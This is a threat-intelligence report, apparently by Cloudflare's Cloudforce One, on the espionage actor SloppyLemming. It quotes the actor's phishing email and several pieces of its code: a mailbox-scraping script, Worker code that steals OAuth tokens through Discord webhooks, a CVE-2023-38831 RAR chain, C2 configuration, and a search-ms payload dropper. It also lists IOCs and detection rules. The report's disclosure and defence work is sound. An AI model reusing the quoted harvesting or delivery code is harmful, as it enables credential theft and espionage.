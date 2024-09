Cloudforce One is publishing the results of an investigation into an advanced actor that uses multiple cloud service providers to facilitate different aspects of their activities, such as credential harvesting, malware delivery and command and control (C2). This actor conducts extensive operations targeting Pakistani, Sri Lanka, Bangladesh, and China. Industries targeted include government, law enforcement, energy, telecommunications, and technology entities.

Executive Summary

Between late 2022 to present, SloppyLemming has routinely used Cloudflare Workers likely as part of a broad espionage campaign targeting South and East Asian countries

SloppyLemming displays a lack of operational security (OPSEC) allowing Cloudforce One insight into its tooling

The actor primarily targets Pakistani government, defense, telecommunications, technology, and energy sector organizations; SloppyLemming also targets Bangladesh, Sri Lanka, Nepal, and China.

Who is SloppyLemming?

SloppyLemming is the cryptonym given by Cloudforce One to this threat actor, which aligns with the adversary OUTRIDER TIGER tracked by CrowdStrike. The actor predominantly relies on open source adversary emulation frameworks, such as Cobalt Strike, Havoc, and others. Based on Cloudflare’s visibility, the actor predominantly targets within Asia. Pakistan is a primary target for SloppyLemming; however, the actor also routinely targets Bangladesh, Indonesia, Sri Lanka, China, and Nepal. Targeted sectors predominantly consist of government entities within Pakistan.

SloppyLemming Phishing Activity Focuses on Credential, Token Collection

SloppyLemming extensively uses credential harvesting as a means to gain access to targeted email accounts within organizations that provide intelligence value to the actor. Throughout our research, Cloudforce One has been able to replicate the actor’s credential harvesting chain. Through our unique visibility, we have also obtained actor-side tools that help facilitate the creation of malicious Workers used in credential harvesting operations, and a utility to collect emails from compromised accounts.

SloppyLemming Credential Harvesting Overview

First, SloppyLemming operators will craft a phishing email that is likely tailor-made for the target to ensure a higher degree of success in the user clicking a malicious link. An example draft phishing email obtained by Cloudforce One can be found below:

Dear [Officer’s Name], As part of our ongoing efforts to enhance the security of our internal systems, we are rolling out a mandatory update to our secure access protocols. All personnel are required to complete this update within the next 24 hours to ensure continued access to department resources. Please log in to the police department’s IT portal using the link below to initiate the update process: [Fake IT Portal Link] Failure to complete this update will result in the temporary suspension of your account access. Thank you for your cooperation. Best regards, IT Department [Police Department’s Name]

Next, the actor uses a custom-built tool named CloudPhish to create a malicious Cloudflare Worker to handle the credential logging logic and exfiltration of victim credentials to the threat actor. CloudPhish works in the following manner:

Operator inputs the following parameters: “Mission” name (Generally, the target of the operation) ​​Target URL Discord Webhook URL Redirect URL Cloudflare URL Scrapes targeted webmail login HTML content Checks if its a support mail client (i.e. Zimbra, Axigen, or cPanel) Replaces legitimate code within scraped webmail login with a link to a malicious Worker’s redirect endpoint Assembles final Worker script Inputs final HTML code of fraudulent login portal with actor redirect Implements credential logging and exfiltration over Discord

SloppyLemming operators will then send malicious emails to their intended targets, and upon receiving login credentials for a compromised account, the actor will then collect emails of interest from the victim. Cloudforce One obtained a copy of a likely actor-side script that allows for the collection of emails from a given account. Portions of this script are detailed below.

# Enter password password_input = driver.find_element(By.ID, "password") password_input.send_keys(password) # Click the login button password_input.send_keys(Keys.RETURN) ... # Navigate to the Inbox inbox_link = driver.find_element(By.CSS_SELECTOR, 'a[href="#zv__main_page__main_Mail"]') inbox_link.click() ... # Iterate through each email in the inbox emails = driver.find_elements(By.CSS_SELECTOR, 'div[class="zA zE"]') for email in emails: # Click on the email email.click() ... # Search for attachments and click on download links attachments = driver.find_elements(By.CSS_SELECTOR, 'a.AttLink[id^="zv__CLV__main_MSGC"][title="Download"]') for attachment in attachments: attachment.click() ... # Go back to the Inbox driver.execute_script("window.history.go(-1)") ... # Get the subject of the first email first_email_subject = driver.find_element_by_css_selector('.zA span.bqe').text print("Subject of the first email:", first_email_subject) ...

Cloudforce One obtained a tutorial likely created by the threat actor where they explain how to use their CloudPhish tool to create a malicious script for credential harvesting operations.

The above screenshot is taken from the training materials, where the actor has created a fake login page masquerading as the webmail portal for the National Assembly of Pakistan. The credential harvesting page is hosted at the Cloudflare Worker domain hxxps[:]//mail-na-gov-pk.na-gov-pk.workers[.]dev/api/login.

SloppyLemming Google OAuth Token Collection

In a limited capacity, we have observed SloppyLemming activity focusing on collecting Google OAuth tokens. Cloudforce One identified a script hosted at storage-e13.sharepoint-e13.workers[.]dev, which contained code that upon visiting the domain displayed to the user a PDF loaded as an iFrame.

... // Serve the initial HTML page with iframe const pdfUrl = 'https[:]//filebox-1-y7125191.deta[.]app/embed/bd9c25278a2639c0'; // Replace with the actual PDF URL ...

After the PDF loads, the user is then redirected to another malicious Worker at the URL https[:]//zoom.osutuga7.workers[.]dev/authenticate, where the server-side code (portions of which are provided below) attempts to reconstruct the user’s Gmail OAuth token to transmit back to the adversary. Similar to how the actor sends credentials via Discord, the OAuth token is also delivered to the actor over Discord.

const DISCORD_WEBHOOK_URL = [Redacted]; const CLIENT_ID = [Redacted]; const CLIENT_SECRET = [Redacted]; const REDIRECT_URI = 'https[:]//storage.sharepoint-e13.workers[.]dev/oauth2callback'; const SCOPES = 'https://mail.google[.]com/'; ... function handleAuthenticate() { const authUrl = new URL('https://accounts.google[.]com/o/oauth2/v2/auth'); authUrl.searchParams.set('client_id', CLIENT_ID); authUrl.searchParams.set('redirect_uri', REDIRECT_URI); authUrl.searchParams.set('response_type', 'code'); authUrl.searchParams.set('scope', SCOPES); authUrl.searchParams.set('access_type', 'offline'); authUrl.searchParams.set('prompt', 'consent'); return Response.redirect(authUrl.toString(), 302); } ... const tokenData = await tokenResponse.json(); await sendToDiscord(tokenData); const pdfUrl = 'https://filebox-1-y7125191.deta[.]app/embed/e2570171795675b4'; return Response.redirect(pdfUrl, 302); } async function sendToDiscord(tokenData,userinfo) { const data = { content: `Captured OAuth Token:

\`\`\`json

${JSON.stringify(tokenData, null, 2)}

\`\`\`` }; ...

Finally, another decoy PDF is displayed in the browser following the token’s collection by the adversary. In this instance, the decoy PDF (as shown below) is a contract update between Taxila Heavy Industries (a Pakistani state-owned enterprise and defense contractor that produces tanks, personnel carriers, and other military vehicles) and a Pakistani metal fabrication company named International Fabrication Company.

Malware Operations

During July 2024, Cloudforce One identified a SloppyLemming Worker that redirects a user to a file hosted on Dropbox. The Worker - sharepoint-punjab.sharepoint-e13.workers[.]dev - contains code that checks if the user is presented a link containing a PDF file named “CamScanner-06-10-2024-15.29.pdf”, and if the condition is met the user is then redirected to a Dropbox URL, as shown in the code below:

... if (!redirectUrl) { return new Response('Bad request: Missing `redirectUrl` query param', { status: 400 }); } if(redirectUrl.includes("CamScanner-06-10-2024-15.29.pdf")){ return Response.redirect("https[:]//www.dropbox[.]com/scl/fi/67twsfn5xy8eanrp7mtw1/CamScanner-06-10-2024-15.29.rar?rlkey=w1kpjdd4iwl4p7c83wbiujw17&st=4i5ahlyz&dl=1"; ...

The file hosted on Dropbox is a RAR file named “CamScanner 06-10-2024 15.29.rar” (SHA256 hash: a3c9b56a0ce787d7aa7787d9ff0e806a6fb0b216327591b1e1113391c609fd17). The RAR likely attempts to exploit CVE-2023-38831 - a vulnerability in WinRAR versions before 6.23, which Cloudforce One also observed FlyingYeti use during its COOKBOX campaign targeting Ukraine. The contents of the RAR file are as follows:

SHA256 Hash Filename CamScanner 06-10-2024 15.29.pdf fb4397c837c7e401712764f953723153d5bb462bc944518959288ea47dec6446 CamScanner 06-10-2024 15.29.pdf 95cf90b2610c6f0ec67c1d669cd252468f6c3b8eaeea588f342d2bd74d90e093 CamScanner 06-12-2024 15.29.pdf .exe 337ca61e23bcb86f26dc40a36316621b74ec6f29a55820899ed30b03b69a6025 CRYPTSP.dll 82e99ceea9e6d31555b0f2bf637318fd97e5609e3d4d1341aec39db2e26cf211

The RAR contains a PDF with the same name as a subdirectory with executable content inside. When attempting to access a file contained in the archive with a vulnerable version of WinRAR, the contents of the directory will also be executed. In this case, the “CamScanner 06-12-2024 15.29.pdf .exe” file is run, which is used to load CRYPTSP.dll via DLL side-loading .

CRYPTSP.dll in turn acts as a downloader, which downloads from Dropbox a file named Outlook.eml (SHA256 hash: b6ae5b714f18ca40a111498d0991e1e30cd95317b4904d2ef0d49937f0552000). The file is not actually an email file, but a renamed Dynamic Link Library (DLL) with an internal name of NekroWire.dll. The final payload is a Remote Access Tool (RAT) that reaches out to several Cloudflare Workers, which all contain the same C2 address - redzone.apl-org[.]online. The Worker code that handles the C2 communications contains configuration information, which can be found below.

let new_agent_url = ['/s2/oz/images/stars/po/bubblev1/border_3.gif', '/_img/logo-icon-large-trans.png', '/_css/newskit.20240127181309.css', '/_css/merriweather.20231026151410.css', '/medium/2024/02/01102602e55ab9e.jpg?r=103509', '/medium/2017/06/5931466588b47.png', '/js/pubcid/latest/pubcid.min.js', '/news/card/1809196'] let command_url = ['/s2/oz/images/stars/po/bubblev1/spacer.gif', '/ajax/libs/lazysizes/5.3.2/lazysizes.min.js', '/pagead/js/adsbygoogle.js', '/thumbnail/2024/03/01143710cc64722.jpg?r=143820', '/news/card/1783810', '/thumbnail/2024/01/27081711bebc45a.png?r=083117', '/sdks/OneSignalPageSDKES6.js?v=151605', '/gtag/js?id=G-C521GRS8DF', '/_css/_jquery.focus-1.0.3.20230822133816.css', '/_css/print.20240130115108.css', '/_js/ad-sticky-close.20231027151511.js', '/safeframe/1-0-40/html/container.html', '/recaptcha/api2/aframe', '/_img/logo-icon--large-trans.png', '/bao-csm/aps-comm/aps_csm.js'] let response_url = ['/sodar/sodar2/225/runner.html', '/static/topics/topics_frame.html', '/_js/all.20231030131909.js', '/api/v1/sync/da41085a-a849-47c0-96e7-4b956b56f35e/web?callback=__jp0', '/activeview/js/current/ufs_web_display.js?cache=r20110914', '/s/subscriptions/subscribe_embed/css/www-subscribe-embed-card_v0.css', '/media/GFI5RgHWEAApVoO?format=jpg&name=small', '/profile_images/1567510144015106049/6L5e_S1N_normal.jpg', '/pagead/js/r20240129/r20110914/client/qs_click_protection_fy2021.js'] const c2_host = "redzone.apl-org[.]online" const protocolx = "http" const fake_c2 = "https[:]//www.dawn[.]com"

Separate SloppyLemming Infection Chain Observed

A separate infection chain used by SloppyLemming likely consists of the actor sending a spear phishing message with a link to the domain mailpitb-securedocs.zapto[.]org, which masquerades as the Punjab Information Technology Board in Pakistan. An identified actor GitHub account contains code that logs when targets navigate to mailpitb-securedocs.zapto[.]org, and then transmits the logs to the actor via Discord. The target is then directed to \\pitb.zapto[.]org@SSL@443\webdav. The code that handles this part of the infection chain is below:

... <script type="text/javascript"> // Function to send a message to Discord via webhook function sendWebhookMessage() { const webhookUrl = 'https://discordapp[.]com/api/webhooks/[redacted]'; const message = { content: 'User clicked the link to open the PITB document.(2nd campaign)' }; // Send the message to the Discord webhook fetch(webhookUrl, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(message) }); } function base64ToArrayBuffer(base64){ var binary_string = window.atob(base64); var len = binary_string.length; var bytes = new Uint8Array(len); for(var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); } return bytes.buffer; } var file = 'PD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8cGVyc2lzdGVkUXVlcnkgdmVyc2lvbj0iMS4wIj4NCiAgICA8cXVlcnk+DQogICAgICAgIDxraW5kTGlzdD4NCiAgICAgICAgICAgIDxraW5kIG5hbWU9Ikl0ZW0iLz4NCiAgICAgICAgPC9raW5kTGlzdD4NCiAgICAgICAgPHNjb3BlPg0KICAgICAgICAgICAgPGluY2x1ZGUgcGF0aCA9ICJcXHBpdGIuemFwdG8ub3JnQFNTTEA0NDNcd2ViZGF2XHBpdGIiLz4NCiAgICAgICAgPC9zY29wZT4NCiAgICA8L3F1ZXJ5Pg0KPC9wZXJzaXN0ZWRRdWVyeT4='; var data = base64ToArrayBuffer(file); var blob = new Blob([data], {type: 'octet/stream'}); var filename = 'PITB-JE5687.pdf.search-ms'; // Name of the file var a = document.createElement('a'); document.body.appendChild(a); a.style = 'display:none'; var url = window.URL.createObjectURL(blob); a.href = url; a.download = filename; a.click(); window.URL.revokeObjectURL(url); // Send the webhook message sendWebhookMessage(); </script> </body> </html>

The value of the file variable in the code above is base64-encoded, and once decoded reveals the next step in the infection chain:

<?xml version="1.0"?> <persistedQuery version="1.0"> <query> <kindList> <kind name="Item"/> </kindList> <scope> <include path = "\\pitb.zapto[.]org@SSL@443\webdav\pitb"/> </scope> </query> </persistedQuery>

The current contents of pitb.zapto[.]org/webdav/pitb is a file named “CIM and IT-Integration.pdf.url” (SHA256 hash: e3bc0246ab95b527aa86e52e62f554ab8db04523f35aee50b508d0fa48ab49f7), which is actually an Internet Shortcut file that contains a URL to download a file:

[InternetShortcut]..URL=\\pitb.zapto[.]org@SSL@443\webdav\PITB-JR5124.exe..IconIndex=13..HotKey=0.IDList=..IconFile=C:\ProgramFiles(x86)\Microsoft\Edge\Application\msedge.exe

The downloaded file, PITB-JR5124.exe (SHA256 hash: b53c7b13a4af47c3976bfad63fe9c5fd988dc0807dd040e8d63d790b65394afb), is a legitimate executable that is used to sideload a DLL named profapi.dll. Cloudforce One identified several malicious DLL files located within the directory pitb.zapto[.]org/webdav/, details of which can be found below.

SHA256 Hash Filename C2 Address 06f82a8d80ec911498e3493ebefa8ad45e102dd887ce2edc11f8f51bafab2e80 sspicli.dll pitb.gov-pkgov.workers[.]dev ac3dff91982709f575cfbc6954b61130b4eeab5d3759772db220f1b76836be4d profapi.dll pitb.gov-pkgov.workers[.]dev 3dfb8d198de95090e2ad3ffc9d9846af5c3074563acb0ce5b0ef62b20e4bf432 profapis.dll pitb.gov-pkgov.workers[.]dev

The above malware samples were all observed communicating with a Cloudflare Worker - pitb.gov-pkgov.workers[.]dev. Analysis of the code reveals that the Worker relays requests to the actual C2 domain used by the actor. In this instance the C2 is aljazeerak[.]online, which currently resolves to the Alibaba US Technology Co., Ltd-owned IP address 8.219.169[.]226.

... const targetDomain = 'aljazeerak[.]online'; const allowedUserAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) MullaChrome/96.0.4664.110 Safari/537.36'; // Check the User-Agent header if (request.headers.get('User-Agent') === allowedUserAgent) { // Construct the new URL const redirectURL = new URL(request.url); redirectURL.hostname = targetDomain; // Create a modified request const modifiedRequest = new Request(redirectURL.toString(), { ...

Additional C2 Infrastructure And Traffic Analysis

Pivoting on the domain pitb.zapto[.]org, which currently resolves to another Alibaba IP address 47.74.10[.]112, reveals this indicator presently and historically resolved to other likely actor-controlled domains, such as:

sco.zapto[.]org

mofapak[.]info

confidential.zapto[.]org

humariweb[.]info

modp-pk[.]org

itsupport-gov[.]com

Separately, Cloudforce One notes that the below is a list of domains used by SloppyLemming that leveraged Cloudflare reverse proxy services and have been mitigated:

apl-org[.]online

apl-com[.]icu

maldevfudding[.]com

navybd-gov[.]info

168-gov[.]info

aljazeerak[.]online

adobefileshare[.]com

crec-bd[.]site

quran-books[.]store

hurr.zapto[.]org

hascolgov[.]info

helpdesk-lab[.]site

Based on Cloudforce One’s visibility into the actor’s C2 infrastructure, the below graphic details a sampling of C2 traffic from confirmed C2 domains between September 1st and September 6th of 2024.

While Pakistan, Bangladesh, and Sri Lanka are consistent with the actor’s target scope, the occurrence of a not-insignificant amount of likely C2 traffic from Australian IP addresses may indicate an expansion of the actor’s targeting. Observed IP addresses were geolocated within Canberra, the Australian capital, leaving open the possibility that the targeting may be government related.

SloppyLemming Targeting and Victimology

Broadly, Cloudforce One observes that the overwhelming majority of credential harvesting operations conducted by SloppyLemming predominantly focus on Pakistan, with the majority of targeted organizations falling within the following categories:

Government Law enforcement Defense Legislative organizations Foreign Affairs Transportation Logistics

Technology IT providers Telecommunications

Energy Construction Equipment operators

Education Universities



Of particular interest, Cloudforce One has observed concerted efforts by SloppyLemming to target Pakistani police departments and other law enforcement organizations. Separately, there are indications that the actor has targeted entities involved in the operation and maintenance of Pakistan’s sole nuclear power facility. Outside of Pakistan, SloppyLemming’s credential harvesting has focused primarily on Sri Lankan and Bangladeshi government and military organizations, and to a lesser extent, Chinese energy and academic sector entities.

Mitigating SloppyLemming Activity

Upon discovery of SloppyLemming threat activity, Cloudforce One took a series of steps to disrupt the threat actor's operations. We developed, tested, and deployed new detections on the Cloudflare platform to identify and mitigate the actor’s activity. In total, we mitigated 13 Workers, and we also notified other cloud services that were leveraged in SloppyLemming operations.

A timeline of SloppyLemming’s activity and our corresponding mitigations can be found below.

Event Timeline

Date Event Description 2024-09-17 16:49 Cloudforce One develops and begins testing mitigation for SloppyLemming 2024-09-20 16:49 Cloudforce One notifies GitHub to take down the actor’s GitHub account 2024-09-20 16:49 Cloudforce One notifies Discord about TA’s usage of Discord for mitigation 2024-09-20 16:12 Cloudforce One disables the running Workers 2024-09-23 14:11 Cloudforce One notifies Dropbox about TA’s usage of Discord for mitigation 2024-09-24 09:00 Cloudforce One publishes the results of this investigation

Coordinating our SloppyLemming Response

Cloudforce One leveraged industry relationships to provide advanced warning and to mitigate the actor’s activity. To provide further protection against this threat actor, Cloudforce One notified and collaborated with GitHub, Dropbox and Discord Threat Intelligence and Trust and Safety Teams. We also notified Cloudflare industry partners such as CrowdStrike, Mandiant/Google Threat Intelligence, and Microsoft Threat Intelligence.

Hunting SloppyLemming Operations

There are several ways to hunt SloppyLemming in your environment. These include using PowerShell to hunt for WinRAR files, deploying Microsoft Sentinel analytics rules, and running Splunk scripts as detailed below. Note that these detections may identify activity related to this threat, but may also trigger unrelated threat activity.

PowerShell Hunting

Consider running a PowerShell script such as this one in your environment to identify exploitation of CVE-2023-38831. This script will interrogate WinRAR files for evidence of the exploit.

CVE-2023-38831 Description:winrar exploit detection open suspios (.tar / .zip / .rar) and run this script to check it function winrar-exploit-detect(){ $targetExtensions = @(".cmd" , ".ps1" , ".bat") $tempDir = [System.Environment]::GetEnvironmentVariable("TEMP") $dirsToCheck = Get-ChildItem -Path $tempDir -Directory -Filter "Rar*" foreach ($dir in $dirsToCheck) { $files = Get-ChildItem -Path $dir.FullName -File foreach ($file in $files) { $fileName = $file.Name $fileExtension = [System.IO.Path]::GetExtension($fileName) if ($targetExtensions -contains $fileExtension) { $fileWithoutExtension = [System.IO.Path]::GetFileNameWithoutExtension($fileName); $filename.TrimEnd() -replace '\.$' $cmdFileName = "$fileWithoutExtension" $secondFile = Join-Path -Path $dir.FullName -ChildPath $cmdFileName if (Test-Path $secondFile -PathType Leaf) { Write-Host "[!] Suspicious pair detected " Write-Host "[*] Original File:$($secondFile)" -ForegroundColor Green Write-Host "[*] Suspicious File:$($file.FullName)" -ForegroundColor Red # Read and display the content of the command file $cmdFileContent = Get-Content -Path $($file.FullName) Write-Host "[+] Command File Content:$cmdFileContent" } } } } }w winrar-exploit-detect

Microsoft Sentinel

In Microsoft Sentinel, consider deploying the rule provided below, which identifies WinRAR execution via cmd.exe. Results generated by this rule may be indicative of attack activity on the endpoint and should be analyzed.

DeviceProcessEvents | where InitiatingProcessParentFileName has @"winrar.exe" | where InitiatingProcessFileName has @"cmd.exe" | project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName | sort by Timestamp desc

Splunk

Consider using this script in your Splunk environment to look for WinRAR CVE-2023-38831 execution on your Microsoft endpoints. Results generated by this script may be indicative of attack activity on the endpoint and should be analyzed.

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=winrar.exe `windows_shells` OR Processes.process_name IN ("certutil.exe","mshta.exe","bitsadmin.exe") by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `winrar_spawning_shell_application_filter`

Cloudflare Product Detections

Cloudflare Email Security

Cloudflare Email Security (CES) customers can identify SloppyLemming activity with the following detections.

CVE-2023-38831

SloppyLemming.Campaign.Police

Recommendations

Cloudflare recommends taking the following steps to mitigate this type of activity:

Implement Zero Trust architecture foundations: Deploy Cloud Email Security to ensure that email services are protected against phishing, BEC and other threats

Ensure your systems have the latest WinRAR and Microsoft security updates installed

Consider preventing WinRAR files from entering your environment, both at your Cloud Email Security solution and your Internet Traffic Gateway

Run an Endpoint Detection and Response (EDR) tool such as CrowdStrike or Microsoft Defender for Endpoint to get visibility into binary execution on hosts

Search your environment for the SloppyLemming indicators of compromise (IOCs) shown below to identify potential actor activity within your network

If you’re looking to uncover additional Threat Intelligence insights for your organization or need bespoke Threat Intelligence information for an incident, consider engaging with Cloudforce One by contacting your Customer Success manager or filling out this form .

Indicators of Compromise

SloppyLemming Infrastructure

Date Observed Domain IP Address 2024-09-03T21:50:47Z www.crec-bd[.]site 47.83.23.246 2024-09-03T21:48:50Z crec-bd[.]site 47.83.23.246 2024-08-22T08:17:15Z jammycanonicalupdates[.]cloud 159.65.6.251 2024-08-14T03:22:26Z locaal.navybd-gov[.]info 139.59.109.136 2024-08-12T07:56:35Z maldevfudding[.]com 37.27.41.167 2024-08-07T00:22:29Z openkm.paknavy-pk[.]org 47.237.105.113 2024-07-23T23:47:21Z cloud.adobefileshare[.]com 185.249.198.218 2024-07-23T23:41:37Z adobefileshare[.]com 185.249.198.218 2024-07-15T03:51:55Z quran-books[.]store 8.222.235.145 2024-07-09T23:33:39Z aljazeerak[.]online 8.219.169.226 2024-06-18T02:26:50Z redzone2.apl-org[.]online 47.237.20.135 2024-06-13T03:26:55Z hurr.zapto[.]org 47.237.20.135 2024-06-05T10:25:44Z login.apl-org[.]online 47.245.56.29 2024-05-30T04:08:00Z helpdesk-lab[.]site 47.237.20.201 2024-05-14T23:32:47Z owa-spamcheck.apl-org[.]online 47.237.25.198 2024-04-30T23:29:42Z redzone.apl-org[.]online 47.245.2.77 2024-04-30T23:28:35Z dawn.apl-org[.]online 47.237.25.198 2024-03-28T01:52:34Z hit-pk[.]org 208.85.22.252 2024-03-18T23:31:23Z blabla.apl-com[.]icu 8.219.114.124 2024-03-14T02:53:22Z acrobat.paknavy-pk[.]org 47.236.65.190 2024-03-14T02:40:17Z paknavy-pk[.]org 47.236.65.190 2024-03-10T20:55:07Z mail.pakistangov[.]com 47.245.114.11 2024-03-04T21:42:18Z mail.apl-com[.]icu 47.236.65.190 2024-02-27T23:16:44Z 168-gov[.]info 47.76.61.241 2024-02-27T22:10:28Z www.168-gov[.]info 47.76.61.241 2024-02-26T01:21:45Z browser.apl-org[.]online 149.28.153.250 2024-02-20T03:43:03Z docs.apl-com[.]icu 47.245.42.208 2024-02-07T22:54:18Z new.apl-org[.]online 47.74.84.168 2024-01-31T02:11:32Z mozilla.apl-org[.]online 47.74.87.155 2024-01-30T09:56:42Z m.opensecurity-legacy[.]com 159.253.120.25 2024-01-30T09:56:28Z monitor.opensecurity-legacy[.]com 159.253.120.25 2024-01-30T09:56:17Z sensors.opensecurity-legacy[.]com 159.253.120.25 2024-01-30T09:56:07Z, static.opensecurity-legacy[.]com 159.253.120.25 2024-01-28T08:22:07Z bin.opensecurity-legacy[.]com 159.253.120.25 2024-01-28T08:09:48Z api.opensecurity-legacy[.]com 159.253.120.25 2024-01-28T08:09:28Z frontend-m.opensecurity-legacy[.]com 159.253.120.25 2024-01-28T08:09:16Z accounts.opensecurity-legacy[.]com 159.253.120.25 2024-01-28T08:02:58Z, opensecurity-legacy[.]com 159.253.120.25 2024-01-09T21:14:22Z oil.hascolgov[.]info 207.148.73.145 2024-01-03T22:21:14Z hesco.hascolgov[.]info 207.148.73.145 2024-01-02T03:00:46Z locall.hascolgov[.]info 207.148.73.145 2023-12-27T22:46:34Z itsupport-gov[.]com 47.254.229.56 2023-12-18T01:00:57Z updpcn[.]online 47.76.181.76 2023-12-17T22:17:47Z update.apl-org[.]online 47.74.84.168 2023-12-05T22:27:17Z zero-berlin-covenant.apl-org[.]online 47.245.126.218 2023-11-30T23:19:46Z fonts.apl-org[.]online 47.74.87.155 2023-11-29T23:20:18Z localhost.apl-com[.]icu 142.93.139.164 2023-11-15T22:45:35Z cloud.cflayerprotection[.]com 45.137.116.8 2023-11-15T22:45:23Z secure.cflayerprotection[.]com 45.137.116.8 2023-11-15T22:42:39Z cflayerprotection[.]com 45.137.116.8 2023-10-15T23:44:47Z data[.]cloudlflares[.]com 45.137.116.8 2023-10-15T23:44:20Z secure[.]cloudlflares[.]com 45.137.116.8 2023-10-15T23:40:46Z cloudlflares[.]com 45.137.116.8 2023-10-15T23:40:46Z www[.]cloudlflares[.]com 45.137.116.8

SloppyLemming Malware Samples

SHA256 Hash Filename C2 Address 06f82a8d80ec911498e3493ebefa8ad45e102dd887ce2edc11f8f51bafab2e80 sspicli.dll pitb.gov-pkgov.workers[.]dev ac3dff91982709f575cfbc6954b61130b4eeab5d3759772db220f1b76836be4d profapi.dll pitb.gov-pkgov.workers[.]dev 3dfb8d198de95090e2ad3ffc9d9846af5c3074563acb0ce5b0ef62b20e4bf432 profapis.dll pitb.gov-pkgov.workers[.]dev 82e99ceea9e6d31555b0f2bf637318fd97e5609e3d4d1341aec39db2e26cf211 CRYPTSP.dll N/A b6ae5b714f18ca40a111498d0991e1e30cd95317b4904d2ef0d49937f0552000 Outlook.eml/ NekroWire.dll redzone.apl-org[.]online

Mitigated SloppyLemming Workers Domains

mail-na-gov-pk.na-gov-pk.workers[.]dev

storage-e13.sharepoint-e13.workers[.]dev

zoom.osutuga7.workers[.]dev

sharepoint-punjab.sharepoint-e13.workers[.]dev

pitb.gov-pkgov.workers[.]dev

mail-islamabadpolice-gov-pk.ntc-telecommunication-safecity.workers[.]dev

herald-b2a.workers[.]dev

images-11d.workers[.]dev

classifieds.workers[.]dev

dawnnews.workers[.]dev

aurora.dawn-904.workers[.]dev

epaper.dawn-323.workers[.]dev

obituary.workers[.]dev

About Cloudforce One

Cloudflare’s mission is to help build a better Internet. And a better Internet can only exist with forces of good that detect, disrupt and degrade threat actors who seek to erode trust and bend the Internet for personal or political gain. Enter Cloudforce One – Cloudflare’s dedicated team of world-renowned threat researchers, tasked with publishing threat intelligence to arm security teams with the necessary context to make fast, confident decisions. We identify and defend against attacks with unique insight that no one else has.

The foundation of our visibility is Cloudflare’s global network – one of the largest in the world – as Cloudflare is used as a reverse proxy by nearly 20% of all websites. Our services are adopted by millions of users across every corner of the Internet, giving us unparalleled visibility into global events – including the most interesting attacks on the Internet. This vantage point allows Cloudforce One to execute real-time reconnaissance, disrupt attacks from the point of launch, and turn intelligence into tactical success.